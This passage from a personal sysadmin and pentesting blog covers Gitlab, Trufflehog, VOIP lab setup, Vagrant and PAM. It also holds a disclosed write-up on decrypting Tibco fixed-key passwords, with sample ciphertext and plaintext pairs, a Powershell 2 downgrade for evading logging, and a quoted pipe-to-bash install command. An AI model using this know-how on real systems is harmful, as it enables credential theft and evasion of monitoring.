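sudo update-ca-certificates

# RHEL/CentOS:
sudo cp corp-ca-chain.pem /etc/pki/ca-trust/source/anchors/
sudo update-ca-trust extract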

Don't forget to restart Gitlab itself, the runners and Docker after making these config changes!

You can then perform a few tests to make sure everything's up and running with the right certs.
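
For example (a sketch; the hostname is my lab's Gitlab, adjust to your own):

# does Gitlab present the new certificate and the full chain?
echo | openssl s_client -connect gitlab.corp.broehaha.nl:443 -showcerts 2>/dev/null | openssl x509 -noout -subject -issuer -dates

# does this host trust it? (no more -k / --insecure needed)
curl -sSI https://gitlab.corp.broehaha.nl/users/sign_in | head -n 1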


kilala.nl tags: , , ,

View or add comments (curr. 0)

Debugging: Trufflehog reports no secrets in Gitlab CICD

2021-02-06 21:59:00

During the CDP class, one of the tools that gets discussed is Trufflehog. TLDR: yet another secrets scanner, this one built in Python. 

I ran into an odd situation running Trufflehog on my internal Gitlab CICD pipelines: despite running it against the intentionally vulnerable project Django.nv, it would come back with exit code 0 and no output at all. 

Why is this odd? Because when I ran Trufflehog by hand against the same repository, it reported a large list of findings.
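
"By hand" here means roughly the same steps the CI job below performs, just from a shell inside a fresh clone of the repository (a sketch):

pip3 install trufflehog
trufflehog --json . | tee trufflehog-output.json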

But whenever I let Gitlab do it all automated, it would always come up blank. So strange! All the troubleshooting I did confirmed that it should have worked: the files were all there, the location was recognized as a Git repository, Trufflehog itself runs perfectly. But it just wouldn't go...

I still don't know why it's not working, but I did find a filthy workaround:

trufflehog:
  stage: build
  allow_failure: true
  image: python:latest
  before_script:
    - pip3 install trufflehog
    - git branch trufflehog
  script:
    - trufflehog --branch trufflehog --json . | tee trufflehog-output.json
  artifacts:
    paths: [ "trufflehog-output.json" ]
    when: always

If I first make a new branch and then hard-force Trufflehog to look at that branch locally, it will work as expected. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Gitlab-runner not picking up jobs after reboot

2021-02-06 19:35:00

As part of my studying for the CDP course, I've expanded my homelab with a private instance of Gitlab. I've got to say: I like it! A lot. It's good software! 

To accommodate my builds I expanded the RAM on my Docker host VM and set up three "gitlab-runners" to pick up jobs from Gitlab CICD pipelines. Gitlab's documentation is outstanding: the runners were installed and configured within minutes.

The only thing I really disliked was their instructions to "wget https://some-url | bash -". That always feels so fscking scary. 

As part of my change management process the Docker host of course needed a reboot, to see if things come up correctly. They did, and the "gitlab-runner" process was there as well. But it wasn't picking up any jobs! Only when I SSHd into the host and ran "sudo gitlab-runner run" would jobs start flowing. 

At first I thought I just didn't understand the concept of the runner process well enough. Maybe I hadn't set them up correctly? Then I decided to do the logical thing: check the logs. I've been teaching my students to do so, so why didn't I? :D

"sudo systemctl status gitlab-runner -l" showed me the following:

$ sudo systemctl status gitlab-runner -l
● gitlab-runner.service - GitLab Runner
   Loaded: loaded
   Active: active

...
Feb 06 19:24:37 gitlab-runner[20361]: WARNING: Checking for jobs... failed
runner=REDACTED status=couldn't execute POST against https://REDACTED/api/v4/jobs/request: 
Post https://REDACTED/api/v4/jobs/request: x509: certificate signed by unknown authority

The self-signed cert isn't too surprising, since I still have a backlog item to get that fixed. I wanted to first get the basics right before getting a proper cert from my PKI. But I thought I had dealt with that by registering the runner with a CA cert override. 

Checking "/etc/gitlab-runner/config.toml" showed me where I had gone wrong: the CA cert override path was relative, not exact.

[[runners]]
  name = "REDACTED"
  url = "https://REDACTED"
  token = "REDACTED"
  tls-ca-file = "./gitlab.pem"
  executor = "docker"

I had assumed that the cert would be picked up by the runner config and stored elsewhere, instead of being referenced from the file system. Wrong! I made sure to copy the self-signed cert to "/etc/gitlab-runner/gitlab.pem" after which I corrected the "config.toml" file to use the correct path. 
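
In commands, the fix amounted to something like this (a sketch):

# give the runner an absolute path to the CA cert it should trust:
sudo cp gitlab.pem /etc/gitlab-runner/gitlab.pem
sudo sed -i 's|"./gitlab.pem"|"/etc/gitlab-runner/gitlab.pem"|' /etc/gitlab-runner/config.toml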

One quick restart of the runner service and now jobs are automatically picked up!


kilala.nl tags: , , ,

View or add comments (curr. 3)

Updating my pen-testing experience: "Modern Webapp Pen-testing" by BHIS and WWHF

2021-01-29 16:14:00

I've been dabbling in pen-testing for a few years now; it's never been my main gig and I wonder whether it'll ever be. For now it's a wonderful challenge which makes its way into my work assignments. 

Case in point: at my new customer I'll be performing pen-tests on contemporary applications and services. Java backends, Javascript frontends and lots of APIs! It's in that area that I feel I need additional development: I've learned and practiced with a lot of vulnerabilities and software stacks, but not these. 

Which is why I yet again turned to Black Hills InfoSec and WWHF, for another training! This time around, it's "Modern webapp pen-testing with B.B. King".

Where the "Applied Purple Teaming" class I recently took was okay, B.B.'s class was excellent! All the labs use OWASP's Juice Shop project, which combines NodeJS on the backend (with REST APIs!) with AngularJS on the frontend. Throw in MongoDB for some NoSQL and you've got a party going!

All in all, B.B.'s teaching style is great and his interactions with us students were pure gold. In general, the Discord chat was lively and had great contributions from people all over the world. I'd highly recommend this class! I'll defo learn more with Juice Shop and other vulnerable apps in the upcoming months. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Teaching software vulnerabilities: OWASP SKF Labs

2021-01-28 15:42:00

At one of my previous clients, we taught developers and engineers about a number of common software vulnerabilities through an in-house course. The training makes use of labs provided by OWASP's SKF Labs project.

The SKF Labs offer dozens of Dockerized mini-webapps, each of them purpose built to demo one type of vulnerability. They're the exact inverse of demo apps like Juice Shop or DVWA, which combine many different vulns into one webapp. 

The Dockerized apps make it easy to teach a small set of vulns to students: all they need is Docker and a way to pull in the public containers. 
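
The general pattern is just a pull and a run; the image name and port below are placeholders only, not real SKF Labs tags (look those up in the SKF Labs repository):

docker pull example/skf-lab-xss            # placeholder image name
docker run --rm -p 127.0.0.1:5000:5000 example/skf-lab-xss
# then point your browser at http://127.0.0.1:5000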

After teaching with these labs, I also wanted to contribute! There were two specific vulnerability types that I wanted to include in our teaching:

Building the first of those apps was easy: just clone one of the existing Dockerized apps and adjust where needed.

The second one was an absolute blast to build, because it forced me to learn new things! I had to practice my Python, I got started with TCP/IP packet crafting in Scapy and I got to learn NetFilter plugins! I learned a lot from a similar project by Ludovic Barman

The TLS downgrade demo is something I'm pretty darn proud of! I learned how to build a Python script which performs a man-in-the-middle attack on TLS, through the abuse of NetFilter plugins and by tweaking TLS packets using Scapy! What a rush!


kilala.nl tags: ,

View or add comments (curr. 0)

"Applied Purple Teaming" training, by BHIS and Defensive Origins

2021-01-08 15:19:00

I fear that I may have been over-doing it a little bit the past few weeks. 

December 21st was my last day at my previous assignment, with my new assignment starting January 11th. The three weeks in between were spent on the holidays and on studying. I pushed through:

The latter two are both advertised as 16 hour trainings, but I've easily spent upwards of 20-25 hours on each to go through the labs and to research side quests. A few hours more on improvements to the labs for the latter, since I ran into many problems with their Terraforming scripts for Azure Cloud. Huzzah for cooperation through Github. 

While I found the APT class very educational, I can't shake the feeling that it could have been better. In some cases K&J skipped through a number of topics relatively quickly ("these are basics", etc.) and at some points there was rapid back-and-forth between slides. Granted, I did watch the VoD recordings of their July session and I expect their more recent classes to have been more fluid. 

Thanks to K&J's class my todo list has grown tremendously. Between trainings and certifications added to my wishlist, I've also added a number of improvements that I would like to apply to my homelab. First and foremost: right-sizing my network segments and properly applying all local firewalls. This is a best-practice that will hinder lateral movement in simulations or real-world scenarios.


kilala.nl tags: , ,

View or add comments (curr. 0)

Powershell auditing: easy bypasses

2021-01-05 15:44:00

While I'm making my way through lab L1120 of BHIS' "Applied Purple Teaming" course, I noticed something interesting: none of my nefarious commands were showing up in HELK, despite me having enabled Powershell logging through a GPO.

In this lab, we're grabbing Sharphound.ps1 from the Bloodhound project, and either download and run it, or just load it into memory using Invoke-Expression. But none of that stuff was showing up in my Kibana dashboard, despite a "whoami" run from Powershell appearing correctly.

That's when I learned that A) downgrading your session to Powershell 2 kills all your logging, B) most of what you run in Powershell ISE (a script editor) is flat-out never logged. In my case: I make it a habit to work inside ISE, because I can easily edit script blocks.

See also this excellent blog post from 2018.

Luckily you can disable Powershell 2 with a GPO (which could end up breaking older scripts). But with regards to ISE: you'll have to completely uninstall, or deny-list it... if possible.

EDIT:

Based on this article by Microsoft themselves, it seems that turning on transcription will also work on Powershell ISE. I'll need to investigate a bit deeper... See if I haven't misconfigured my setup.

EDIT 2:

Yeah. The Powershell 2 logging bypass is valid, but the lack of logging through Powershell ISE was a case of #PEBCAK. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed AZ-900; experiences with OnVue exam at home

2021-01-02 14:48:00

It's nice when sidetracks during learning lead to measurable results. Case in point: while setting up the labs for the BHIS "Applied Purple Teaming" training, I needed to quickly learn about Azure Cloud. ... And now I've passed the AZ-900 exam! :D

Microsoft offers (most of) their exams to take at-home remotely, through Pearson Vue's "OnVue" service. I already worked with OnVue back in August, when taking the Cloud+ beta exam. My experience this time around was very similar: the tooling works well, as long as you make sure to turn off your local outbound firewall like Little Snitch

As to the AZ-900 exam: it was a nice motivator (the proverbial carrot on the stick) for me to go through the six Azure Fundamentals modules on Microsoft Learn. I'm happy to have finally gotten some hands-on experience with Azure Cloud, or basically any cloud provider beyond running a shortlived VM on AWS.

After completing the BHIS APT training I intend to play around with Azure a bit more... Maybe I'll even rebuild this website on there!


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed RedHat EX407V27K, experiences with remote Kiosk exams

2020-12-23 23:06:00

As I mentioned earlier this week, I've been studying for RedHat's EX407 exam. Looking back at my CPE records / bookkeeping I've been at it an embarrassingly long time: I started studying back in March of 2019. Almost two years ago! Just too many fun and interesting things kept getting in the way!

Between teaching Linux+ to a group of students, passing CTT+, Linux+, CySA+ and CRTP, and taking classes on DFIR and PKI, it was all just tooooo tempting! And Ansible was just a little too boring! So as I said before: "booo!" to my lack of discipline! Dragging my feet on EX407 almost caused me to lose my RHCSA/RHCE certifications, because they needed to be renewed. 

But enough about that! Let's talk some interesting points!

All those study materials I linked to, especially Tomas' practice exam, proved to be absolute gold. Without them I wouldn't have passed, because pass I did! Out of a max of 300 (I think?) and with a passing grade of 210 I scored 239 points.

I dropped points mostly due to inexperience with Jinja2 templating and its logic (tests, loops) and with Ansible Galaxy and requirements-files. Out of 16 tasks I knew up front that I'd fail 3 of them because I couldn't get the playbooks to work correctly. Lessons learned and I'll definitely try to practice more in my homelab!

Finally, after being one of the first 100 people to take a Red Hat Kiosk exam, I'll also weigh in on Red Hat's remote, at-home exams. RH had fallen behind to its competitors in that regard, still forcing students to come in to testing centers. What with Covid-19, that strategy needed to change, fast. So they did, in September of this year.

All in all I very much appreciate Red Hat's remote, at-home testing. To sum it up: you flash a RH-provided Linux image to a USB drive, plug that into your PC and boot it up. This turns your private PC into a RH Kiosk system, exactly like they use in their official testing centers! The only vexing part of the setup is that you need TWO functioning web cams, one of which MUST be cabled and pointed at you from the side. 

Overall, the bootable Kiosk Linux is great. It provides pre-exam setup testing to ensure you can actually take the exam. From there on out things work exactly like, or actually better than, the Kiosk at the testing center. Testing from home is absolutely great! After my bad experiences with EX413 I'd been turned off of RH's exams, but this has turned me around a bit. 

I'm happy to have passed EX407! Time to go over my plan for the next few months! I have a few pen-testing classes lined up and will also need to prepare for teaching my next group of students!


kilala.nl tags: , ,

View or add comments (curr. 0)

RedHat EX407 / EX294 study materials

2020-12-17 08:39:00

I've been studying on and off for the EX407 Ansible exam for ... lemme check... 1.8 years now. Started in March of 2019, hoping to renew my RHCE in time, but then I kept on getting distracted. Two certs and three other studies further, I still need to pass EX407 to renew my RHCE. Way to go on that discipline! ( ; ^_^)

Anywho, there's a few resources that proved to be helpful along the way; thought I'd share them here. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Exploit: Tibco password decryption

2020-12-08 14:11:00

The following article is an exploit write-up which I published on my Github repository. It describes a security vulnerability I found in Tibco's software, which I submitted to the vendor through proper responsible disclosure. Now that Tibco have finished their follow-up, I am allowed to publish my findings.

 

Introduction

During a pen-test of an internally developed application, I discovered that the engineers in question had re-used a commercial Java library for password obfuscation.

While their application was not part of a Tibco stack, nor did it use Tibco, they did make use of Tibco's "ObfuscationEngine". On Tibco systems, this tool is used to obfuscate (and sometimes encrypt) passwords for safe storage in configuration files.

 

Update: previous works

My colleague Wouter R. referred me to a project from a few years ago which apparently performs the exact same attack: Thomas D's "tibcopasswordrevealer", built in Python. Neither at the time of my pentest, nor up until an hour ago, was I aware of this previous work. Until my colleague pointed out the project, I had only found people re-using the "tibcrypt.jar" library.

 

Background

Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling: using a machine key, using a custom encryption key, or using Tibco's built-in fixed key (source: the documentation).

This write-up pertains to the third mode, the fixed key. The documentation states both:

"The fixed key […] does not provide the same level of security as the use of a machine key or a custom encryption key. It is used to encrypt an administration domain’s password.”

and

"Passwords encrypted using Obfuscate Utility cannot be decrypted. Ownership is with customers to remember passwords in clear text. There is no utility provided by TIBCO to decrypt passwords encrypted using Obfuscate Utility.”.

 

Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!.

For example:

#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA

 

Issues

The first statement does not make clear the risks that are involved, while the second statement is blatantly incorrect.

On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key.

I performed a pen-test on an application, where the above-mentioned ObfuscationEngine had made its way into their in-house code. Because I did not have access to Tibco's copyrighted libraries, I was happy to find one source online that had the older “tibcrypt.jar” available.

-> https://mvnrepository.com/artifact/tibco-ems/tibcrypt/4.1

 

By analyzing this JAR file, I recovered the fixed key. Using that, I wrote a small Java utility that can decrypt any secret that was encrypted using the Tibco fixed key, regardless of whether Tibco libraries are available.

The code is provided in my Github repository as “decrypt.java”.

 

Impact

Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does not require access to Tibco software or libraries.

All you need are exfiltrated secret strings that start with the characters #!.

This is not going to be fixed by Tibco; it is a design decision, kept for backwards compatibility in their software.

 

Instructions

Compile with:

	javac decrypt.java

 

Examples of running, with secrets retrieved from websites and forums:

	java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
	7474

	java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
	tibco

Outcome

I have shared my findings internally with my client. I have advised them to A) stop including Tibco's copyrighted classes and libraries into their own Java applications, B) replace all secrets encrypted using this method, as they should be considered compromised.

The proof of concept code has been shared with the customer as part of the pen-test report.

I reported this situation to Tibco's responsible disclosure team (security@tibco.com) on September 9th 2020.

On December 8th Tibco's security team responded that they have updated the Tibco administrators documentation to make it clear that the fixed key method of ObfuscationEngine should not be considered secure.

-> https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=3

 

The text now reads:

"The fixed key is compatible with earlier versions of TIBCO Runtime Agent but should not be treated as secure. A machine key or custom encryption key should be used whenever possible."

 

CVE / Vulnerability information

No CVE was awarded as the vendor did not recognize this as a vulnerability. This is intended functionality, which "works as designed".


kilala.nl tags: ,

View or add comments (curr. 1)

Using the 3CX soft-phone through RDP (Linux and Windows)

2020-12-05 22:59:00

In order to simulate a "work-from-home" (WFH) situation in the lab, I'm very happy to test the 3CX web client. Their webapp supports a lot of the productivity features you'd expect and works with a browser extension (Edge and Chrome) to make actual calls. No need to install a soft-phone application, just grab the browser extension!

The RDP protocol supports the redirection of various types of hardware, including audio input and output. This requires that you enable it for your target host (or in general). For example, in Royal TSX you would edit the RDP connection, go to Properties > Redirection and put a check in the box for "Record audio from this computer". Also select "Bring audio to this computer".

With a Windows target host it'll now work without a hassle.

Linux is a different story, but that's because the xRDP daemon needs a little massaging. Specifically, you will need to build an extra module or two for PulseAudio. This isn't something you can simply "apt install", but the steps are simple enough. Full documentation over here.
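
Very roughly, the build goes something like this (a sketch; follow the documentation linked above for the exact steps and package names on your distro):

sudo apt install git build-essential autoconf libtool libpulse-dev
git clone https://github.com/neutrinolabs/pulseaudio-module-xrdp.git
cd pulseaudio-module-xrdp
# the repo's helper scripts fetch the matching PulseAudio sources, build
# module-xrdp-sink.so / module-xrdp-source.so and install them into PulseAudio's module dir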

After building and installing the modules, you'll need to logout and log back in. After that playing audio works and PulseAudio will have detected your system's microphone as well. 


kilala.nl tags: , ,

View or add comments (curr. 0)

State of the homelab: December 2020

2020-12-05 16:15:00

a map of the network

It's been a busy year! Between adding new hardware, working with Ansible and messing with forensics and VOIP, the lab has evolved. I'm very lucky to have all of this at my disposal and I'm grateful to everybody who's helped me get where I am today. :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Running a VOIP/SIP homelab with 3CX (free) PBX

2020-12-05 15:25:00

the admin panel and phone app

Just yesterday, a lucrative dumpster dive netted me two brand-new IP desk phones, very spiffy Grandstream GXP2130 models. Because studying for my upcoming Ansible exam isn't much fun (OMG two weeks!!), procrastination struck!

Let's add VOIP to my simulated company Broehaha in my homelab!

Until this weekend I had zero experience with VOIP, SIP and the like, beyond using Cisco phones as an end-user. I'd heard plenty of colleagues talk about Asterisk and I remember hacking an Asterisk server in the PWK labs at Offensive Security, but that's about as far as my exposure went. 

Wanting to save time and to simulate an actual company, I quickly gave up on both Asterisk and FreeSwitch. As the meme goes: "Ain't nobody got time fo' that!"

A little search further led me to 3CX, a commercial PBX solution that provides a free edition for (very limited) small environments. They offer a Debian-based soft-appliance that you can deploy from ISO anywhere you like.

So:

Last night I spent from 2200-0100 mucking around with 3CX because no matter what I tried, the GXP2130 would not show up on the admin UI. The phone's in the network just fine and could also talk to 3CX, but there were a few steps missing.

Continuing this morning, I used tcpdump and other tools to dig into what the phone was (and wasn't) doing on the network. After lunch, things fell into place :)

  1. The phone's firmware was too old to PNP with 3CX. 
  2. Upgrading from 1.0.7.25 to 1.0.11.16 failed because the gap was too large. 

So... I upgraded the phone's firmware in four steps, using an on-prem update server. Then, after resetting the phone to factory defaults, it showed up just fine and I could add it to one of my extensions!

the phone shows up

The cool part is that 3CX comes with a web UI for end-users, that also works with their browser extension for Chrome or Edge. Now I can simulate a working-from-home situation, with one user on a Windows 10 VM calling the "reception" on the Grandstream phone. Or vice versa. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Upgrading Grandstream GXP2130 from 1.0.7.x to 1.0.11.x

2020-12-05 13:43:00

With many thanks to my friends at ITVitae and some dumpster diving I snagged two brand-new Grandstream GXP2130 IP phones, to practice VOIP in my homelab. They're pretty sexy phones! Nice build quality and a very decent admin interface: a great first step into the world of VOIP / SIP. 

Out of the box, these two phones came with the dated 1.0.7.25 firmware. No matter what I tried, they refused to upgrade to the current version 1.0.11.16. Pointing them at the Grandstream firmware site? Nothing. Pointing them at a local web server with the 1.0.11.16 firmware? Nothing. 

After a bit of searching, I found a helpful thread on the GS support forums that suggests that the firmware version gap is simply too great. We need to apply a few of the in-between versions, one by one.

As a work-around I built my own firmware upgrade server, in the VOIP network segment of my homelab. A simple CentOS 7 box with Apache. I then did the following:

cd /tmp
wget http://www.grandstream.com/sites/default/files/Resources/RingTone.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.7.97.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.8.56.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.9.135.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.11.3.zip
wget http://firmware.grandstream.com/Release_GXP2130_1.0.11.16.zip 

unzip RingTone.zip
for FILE in $(ls Release*zip); do unzip $FILE; done

cd /var/www/html
sudo mkdir 7 8 9 11

sudo cp /tmp/ring* 7/; sudo cp /tmp/Rel*.7.*/*bin 7/
sudo cp /tmp/ring* 8/; sudo cp /tmp/Rel*.8.*/*bin 8/
sudo cp /tmp/ring* 9/; sudo cp /tmp/Rel*.9.*/*bin 9/
sudo cp /tmp/ring* 11/; sudo cp /tmp/Rel*.11.*/*bin 11/

sudo chmod -R o+r *

From there on out, run a "sudo tail -f /var/log/httpd/access.log" to see if the phone is actually attempting to pick up the relevant update files.

Then, on the phone, login as "admin" and browse to Maintenance > Upgrade and Provisioning. Set the access method to HTTP. As the Firmware Server Path set the IP address of the newly built upgrade server (e.g. 192.168.210.100), followed by the version path. We will change this path for every version upgrade.

For example, for the first step the Firmware Server Path would be 192.168.210.100/7.

First update to 1.0.7.97: set the path, click Save and Apply, then at the top click Provision. You should see the phone downloading the firmware update in "access.log". Once the phone has rebooted, check the web interface for the current version number.

Then "lather, rince and repeat" for each consecutive version. After 7, upgrade to 8, then to 9, then to 11 (this works without issues). In the end you will have a Grandstream phone running 1.0.11.16, after starting at 1.0.7.25.

Afterwards: don't forget to reset the phone to factory defaults, so it will correctly join your PBX for auto-provisioning. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Fun in the homelab: Vagrant and ESXi

2020-12-02 19:16:00

It's been a while since I've worked in my homelab, between my day-job and my teaching gig there's just been no time at all. But, with my EX407 around the corner it's time to hammer Ansible home!

Of course, it's tempting to get sidetracked! So when Tomas' Lisenet practice exam for EX407 suggests I need five VMs with RHEL, I go and find a way to build those post-haste. Now that I've been playing with Vagrant more often, that's become a lot easier!

First, there's a dependency: you will need to download and install a recent version of VMware's OVFTool. Make sure that its binary is in your $PATH.

After that, JosenK's Vagrant plugin for VMware ESXi makes life so, so easy! On my Linux workstation it was as easy as:

$ sudo apt install vagrant
$ vagrant plugin install vagrant-vmware-esxi
$ mkdir vagrant-first-try; cd vagrant-first-try
$ vagrant init
$ vi Vagrantfile

After which the whole Vagrantfile gets replaced as follows:

nodes = {
   "vagrant1.corp.broehaha.nl" => ["bento/centos-8", 1, 512, 50 ],
   "vagrant2.corp.broehaha.nl" => ["bento/centos-8", 1, 512, 50 ],
   "vagrant3.corp.broehaha.nl" => ["bento/centos-8", 1, 512, 50 ],
   "vagrant4.corp.broehaha.nl" => ["bento/centos-7", 1, 512, 50 ],
   "vagrant5.corp.broehaha.nl" => ["bento/centos-7", 1, 512, 50 ],
}

Vagrant.configure(2) do |config|
  nodes.each do | (name, cfg) |
    box, numvcpus, memory, storage = cfg
    config.vm.define name do |machine|

      machine.vm.box      = box
      machine.vm.hostname = name
      machine.vm.synced_folder('.', '/Vagrantfiles', type: 'rsync')
      machine.vm.provider :vmware_esxi do |esxi|
        esxi.esxi_hostname         = '192.168.0.55'
        esxi.esxi_username         = 'root'
        esxi.esxi_password         = 'prompt:'
        esxi.esxi_virtual_network  = "Testbed"
        esxi.guest_numvcpus        = numvcpus
        esxi.guest_memsize         = memory
        esxi.guest_autostart       = 'true'
        esxi.esxi_disk_store       = '300GB'

      end
    end
  end
end
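
With that Vagrantfile saved, bringing the boxes up is just a matter of the following (the plugin will prompt for the ESXi root password, per the 'prompt:' setting above):

vagrant up                                # build and boot all five VMs on the ESXi host
vagrant up vagrant1.corp.broehaha.nl      # or just a single one
vagrant ssh vagrant1.corp.broehaha.nl     # log into a box
vagrant destroy -f                        # tear everything down again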

To explain a few things:

Any requirements? Yup!

 


kilala.nl tags: , , ,

View or add comments (curr. 1)

Chocolatey Git on Windows: where is my SSH configuration?!

2020-11-10 19:52:00

For a while now, I've been using Git + SSH on Windows 10 and I've been very content about the whole setup.

Git was installed using Chocolatey, just because it's easy and takes care of a few things for you. But as it turns out, it does a little bit "too much" in the background. 

I wanted to move my SSH files (private key, known_hosts etc.) to OneDrive, thus changing the path to the files. I just couldn't figure out where the SSH client configuration for the Chocolatey-installed Git was tucked away. This Git does not use the default OpenSSH client delivered by Windows 10 (C:\windows\system32\OpenSSH\ssh).

An hour of searching made me realize that "git.install", the package from Choco, includes a mini Unix-like environment. It's not a native Windows build of Git: it runs on MINGW-W64.

I found the following files, which define the behavior of the Choco-installed Git + SSH:

In the latter file, you can set UserKnownHostsFile and IdentityFile to set the file path for the private key and known_hosts.
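
For illustration, the relevant lines in that ssh_config end up looking something like this (the paths are just examples; point them at wherever your OneDrive keeps the files, using MINGW-style /c/... notation):

Host *
    UserKnownHostsFile /c/Users/tess/OneDrive/ssh/known_hosts
    IdentityFile       /c/Users/tess/OneDrive/ssh/id_rsa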


kilala.nl tags: , ,

View or add comments (curr. 0)

Updated: Running VirtualBox, Docker and Hyper-V on Windows 10

2020-11-09 20:53:00

A while back I wrote detailed instructions on how we managed to get VBox to run on Windows 10 with Hyper-V remaining enabled. This required a little tweaking, but it allowed us to retain all of the Win10 security features offered by Hyper-V.

Recently the VirtualBox team released version 6.1.16 which includes a number of improvements aimed at Windows 10 and "Windows Hypervisor Platform". 

You now no longer need any of the tweaks I described earlier! Vanilla VirtualBox 6.1.16 runs on top of Hyper-V and WHP without further issues. SHA2 hashing works well and GCrypt no longer needs to have its acceleration disabled! This makes life so much easier!


kilala.nl tags: , ,

View or add comments (curr. 0)

Understanding pam_unix and unix_chkpwd

2020-10-24 23:49:00

One of the benefits of teaching Linux to a group of young adults, is that it forces me to go back to the books myself. The Linux+ objectives cover a few things I haven't worked with yet (such as MDM), but also touches on things I haven't given much thought yet. Case in point: PAM.

Just about every Linux sysadmin certification exam requires that you can work with Pluggable Authentication Modules. They want you to make sure your SSHd or SU authenticates correctly, or to include pam_tally. So we learn about /etc/pam.conf and /etc/pam.d/* and how to set up an auth or session stack correctly. 

What led me down a rabbithole was this: what if I want to make a Python app that authenticates users? I found references to python-pam and other modules, but most discussions ended with: "You need to run as root, or add your application user to the shadow group."

Initially this felt odd to me because, aren't we teaching everybody that services shouldn't run as "root"? In the end it does make sense, of course, because if any arbitrary user could (ab)use PAM to verify another user's password that'd be problematic. The process might be very noisy, but you could still try to brute-force the password. 

One source of confusion was the pam_unix documentation, which states:

"A helper binary, unix_chkpwd(8), is provided to check the user's password when it is stored in a read protected database. This binary is very simple and will only check the password of the user invoking it. It is called transparently on behalf of the user by the authenticating component of this module. In this way it is possible for applications like xlock(1) to work without being setuid-root."

Stupidly my brain glossed over the important parts (I need sleep) and latched onto the "without being setuid-root". The important part being that it "will only check the password of the user invoking it". 

What made me finally understand the workings of unix_chkpwd is a project of Marco Bellaccini's that I found on Github -> chkpwd_buddy. It showed me the proper way of interacting with unix_chkpwd as a non-root user: FIFO pipes. 

$ mkfifo /tmp/myfifo

$ echo -ne 'testing\0' > /tmp/myfifo &
$ /sbin/unix_chkpwd tess nullok < /tmp/myfifo
$ echo $?
0

$ echo -ne 'testing\0' > /tmp/myfifo &
$ /sbin/unix_chkpwd testaccount nullok < /tmp/myfifo
$ echo $?
7

$ sudo -i
# mkfifo /tmp/rootfifo

# echo -ne 'testing\0' > /tmp/rootfifo &
# /sbin/unix_chkpwd tess nullok < /tmp/rootfifo
# echo $?
0

# echo -ne 'testing\0' > /tmp/rootfifo &
# /sbin/unix_chkpwd testaccount nullok < /tmp/rootfifo
# echo $?
0

Root can verify both my "tess" password and the one on "testaccount", while I could only verify my own password with my normal account. 

What's interesting is that only the failed validation attempt shows up in journalctl. The successful attempts are not registered:

$ sudo journalctl -t unix_chkpwd
Oct 22 16:08:53 kalivm unix_chkpwd[86131]: check pass; user unknown
Oct 22 16:08:53 kalivm unix_chkpwd[86131]: password check failed for user (test)

To sum it up: if you want a Python app to authenticate the running user's own identity, you can use the python-pam module. But if you want the Python app to authenticate any/every user, then it will need to run as "root". 


kilala.nl tags: , ,

View or add comments (curr. 0)

Running VirtualBox together with Hyper-V on Windows 10

2020-10-06 19:30:00

EDIT: The tweaks outlined in this blog post are no longer needed. Read this update!

Sometimes you just have an odd need or craving! You just have to have some spicy curry udon after midnight! You just have to get an old RAID controller to work in your homelab! Or in this case: you just really have to get VirtualBox and Hyper-V to play nice on Windows 10. 

That's something that just wouldn't fly until recently. But now it'll work!

 

I would like to extend my warmest thanks to my colleague Praveen K-P, who worked with me to figure all of this out. =)

 

Requirements

 

Caveats

These instructions are a work-in-progress and the solution is not 100% rock-solid.

Some mathematical functions, such as SHA2 or CRC, may fail depending on the OS you run in the VM. This means that outright installing an OS from DVD or ISO may fail during extraction: SHA1 or SHA2 checksums won't match up and the installer will refuse to continue. This is likely caused by the layered CPU virtualization and is under research with the VirtualBox team.

Also, please be careful when choosing base images for your VirtualBox VMs! Do not assume that you can trust every VM image on the Vagrant repositories! Only install images from trusted providers such as:

Installing untrusted base images may lead to malware infections or worse.

 

Installation

  1. Enable the Windows optional feature "Windows Hypervisor Platform".
    1. Go to Add/Remove Programs → Turn Windows Features on/off.
    2. Make sure there are checkmarks at both "Hyper-V" and "Windows Hypervisor Platform".
  2. Install the latest VirtualBox, but at least >=6.1.10.
  3. Install Vagrant.

 

For example: running Kali Linux

Kali Linux is one of the distributions whose installation fails due to the caveat involving mathematical functions. So let's use Vagrant instead, which pulls pre-built images from an online repository. 

Open Powershell. Run the following commands:

        cd $HOME
        mkdir Vagrant; cd Vagrant;
        vagrant init kalilinux/rolling

Before continuing, edit the "vagrantfile" file (e.g. with Notepad) and replace this line:

       config.vm.box = "kalilinux/rolling"

 

With the following configuration. Edit the amount of RAM and CPUs to your liking. Me, I like 6GB and 3 cores.

    config.vm.define "kali" do |kali|
        kali.vm.box = "kalilinux/rolling"
        kali.vm.hostname = "haxor"

        kali.vm.provider "virtualbox" do |vb|
            vb.gui = true
            vb.memory = "6144"
            vb.cpus = 3
            vb.customize [ "modifyvm", :id, "--paravirtprovider", "minimal" ]
        end

        kali.vm.synced_folder '.', '/vagrant', disabled: true

        kali.vm.provision "shell", inline: <<-SHELL
            echo "Here we would install..."
            [[ ! -d /etc/gcrypt ]] && mkdir /etc/gcrypt
            [[ ! -f /etc/gcrypt/hwf.deny ]] && echo "all" >> /etc/gcrypt/hwf.deny
        SHELL
    end

 

Save the configuration file and now run the following in Powershell: 

        vagrant up kali

The init-command sets up your "Vagrant" directory and a basic configuration file. By editing the "vagrantfile" we can change a lot of the behavior, including the way Kali perceives the VirtualBox hypervisor. We also tweak GCrypt, so it will refuse to try hardware accelerated cryptography. Both are required to make hashing and other maths work better.

